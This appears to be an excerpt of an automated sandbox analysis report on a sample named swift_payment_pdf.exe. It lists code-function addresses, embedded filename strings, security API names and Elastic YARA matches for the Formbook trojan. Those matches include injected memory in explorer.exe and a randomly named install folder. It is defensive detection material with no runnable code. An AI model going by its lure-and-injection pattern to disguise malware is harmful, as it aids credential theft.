            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140E4F65_2_0140E4F6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013607705_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013847505_2_01384750
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135C7C05_2_0135C7C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137C6E05_2_0137C6E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013769625_2_01376962
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A05_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142A9A65_2_0142A9A6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013628405_2_01362840
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136A8405_2_0136A840
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013468B85_2_013468B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E8F05_2_0138E8F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141AB405_2_0141AB40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01416BD75_2_01416BD7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA805_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FCD1F5_2_013FCD1F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136AD005_2_0136AD00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01378DBF5_2_01378DBF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135ADE05_2_0135ADE0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360C005_2_01360C00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350CF25_2_01350CF2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400CB55_2_01400CB5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01380F305_2_01380F30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013A2F285_2_013A2F28
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01402F305_2_01402F30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D4F405_2_013D4F40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DEFA05_2_013DEFA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352FC85_2_01352FC8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141EE265_2_0141EE26
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360E595_2_01360E59
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141EEDB5_2_0141EEDB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372E905_2_01372E90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141CE935_2_0141CE93
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142B16B5_2_0142B16B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134F1725_2_0134F172
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139516C5_2_0139516C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136B1B05_2_0136B1B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140F0CC5_2_0140F0CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141F0E05_2_0141F0E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014170E95_2_014170E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013670C05_2_013670C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141132D5_2_0141132D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134D34C5_2_0134D34C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013A739A5_2_013A739A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013652A05_2_013652A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014012ED5_2_014012ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137D2F05_2_0137D2F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137B2C05_2_0137B2C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014175715_2_01417571
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014295C35_2_014295C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FD5B05_2_013FD5B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013514605_2_01351460
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141F43F5_2_0141F43F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141F7B05_2_0141F7B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013A56305_2_013A5630
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014116CC5_2_014116CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F59105_2_013F5910
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013699505_2_01369950
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137B9505_2_0137B950
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CD8005_2_013CD800
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013638E05_2_013638E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141FB765_2_0141FB76
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137FB805_2_0137FB80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139DBF95_2_0139DBF9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D5BF05_2_013D5BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01417A465_2_01417A46
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141FA495_2_0141FA49
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D3A6C5_2_013D3A6C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140DAC65_2_0140DAC6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FDAAC5_2_013FDAAC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013A5AA05_2_013A5AA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01401AA35_2_01401AA3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01411D5A5_2_01411D5A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01417D735_2_01417D73
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01363D405_2_01363D40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137FDC05_2_0137FDC0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D9C325_2_013D9C32
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141FCF25_2_0141FCF2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141FF095_2_0141FF09
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01361F925_2_01361F92
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01323FD25_2_01323FD2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01323FD55_2_01323FD5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141FFB15_2_0141FFB1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01369EB05_2_01369EB0
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0492A8446_2_0492A844
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0492C5F96_2_0492C5F9
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04949E196_2_04949E19
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04932F456_2_04932F45
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04932F496_2_04932F49
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0492A8996_2_0492A899
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0492C8196_2_0492C819
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050A05917_2_050A0591
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050844207_2_05084420
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050924467_2_05092446
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE05357_2_04FE0535
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0508E4F67_2_0508E4F6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFC6E07_2_04FFC6E0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050047507_2_05004750
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FDC7C07_2_04FDC7C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE07707_2_04FE0770
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0507A1187_2_0507A118
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050681587_2_05068158
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050A01AA7_2_050A01AA
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050941A27_2_050941A2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050981CC7_2_050981CC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050720007_2_05072000
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD01007_2_04FD0100
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509A3527_2_0509A352
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050A03E67_2_050A03E6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FEE3F07_2_04FEE3F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050802747_2_05080274
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050602C07_2_050602C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD0CF27_2_04FD0CF2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0507CD1F7_2_0507CD1F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE0C007_2_04FE0C00
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FDADE07_2_04FDADE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FF8DBF7_2_04FF8DBF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05080CB57_2_05080CB5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FEAD007_2_04FEAD00
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05022F287_2_05022F28
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05000F307_2_05000F30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05082F307_2_05082F30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05054F407_2_05054F40
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FF2E907_2_04FF2E90
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0505EFA07_2_0505EFA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE0E597_2_04FE0E59
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509EE267_2_0509EE26
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD2FC87_2_04FD2FC8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509CE937_2_0509CE93
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509EEDB7_2_0509EEDB
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FC68B87_2_04FC68B8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050AA9A67_2_050AA9A6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE28407_2_04FE2840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FEA8407_2_04FEA840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE29A07_2_04FE29A0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FF69627_2_04FF6962
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0500E8F07_2_0500E8F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509AB407_2_0509AB40
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FDEA807_2_04FDEA80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05096BD77_2_05096BD7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050975717_2_05097571
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD14607_2_04FD1460
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0507D5B07_2_0507D5B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050A95C37_2_050A95C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509F43F7_2_0509F43F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509F7B07_2_0509F7B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050256307_2_05025630
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050916CC7_2_050916CC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE70C07_2_04FE70C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050AB16B7_2_050AB16B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0501516C7_2_0501516C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FEB1B07_2_04FEB1B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FCF1727_2_04FCF172
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0508F0CC7_2_0508F0CC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050970E97_2_050970E9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509F0E07_2_0509F0E0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFD2F07_2_04FFD2F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509132D7_2_0509132D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFB2C07_2_04FFB2C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE52A07_2_04FE52A0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0502739A7_2_0502739A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FCD34C7_2_04FCD34C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050812ED7_2_050812ED
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05091D5A7_2_05091D5A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05097D737_2_05097D73
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05059C327_2_05059C32
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFFDC07_2_04FFFDC0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE3D407_2_04FE3D40
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509FCF27_2_0509FCF2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509FF097_2_0509FF09
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE9EB07_2_04FE9EB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509FFB17_2_0509FFB1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA3FD27_2_04FA3FD2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA3FD57_2_04FA3FD5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE1F927_2_04FE1F92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_050759107_2_05075910
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE38E07_2_04FE38E0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0504D8007_2_0504D800
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FE99507_2_04FE9950
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFB9507_2_04FFB950
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509FB767_2_0509FB76
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05055BF07_2_05055BF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0501DBF97_2_0501DBF9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0509FA497_2_0509FA49
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05097A467_2_05097A46
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05053A6C7_2_05053A6C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FFFB807_2_04FFFB80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05025AA07_2_05025AA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0507DAAC7_2_0507DAAC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05081AA37_2_05081AA3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0508DAC67_2_0508DAC6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F01B207_2_02F01B20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F059907_2_02F05990
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F1A5207_2_02F1A520
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02EFAFA07_2_02EFAFA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02EFCF207_2_02EFCF20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02EFCD007_2_02EFCD00
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F036507_2_02F03650
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F0364C7_2_02F0364C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04DFB0787_2_04DFB078
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04DFC00C7_2_04DFC00C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04DFBC757_2_04DFBC75
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04DFBB547_2_04DFBB54
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 01395130 appears 58 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 0134B970 appears 262 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013A7E54 appears 107 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013CEA12 appears 86 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013DF290 appears 103 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 05015130 appears 58 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0505F290 appears 103 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04FCB970 appears 262 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0504EA12 appears 86 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 05027E54 appears 107 times
            Source: swift_payment_pdf.exe, 00000000.00000002.1912740382.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1916823492.0000000007A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1916473043.0000000007450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1911611651.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1917077942.0000000007B90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiDIX vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1913294244.000000000489E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000005.00000002.2253655752.000000000144D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exeBinary or memory string: OriginalFilenameiDIX.exeR vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: swift_payment_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
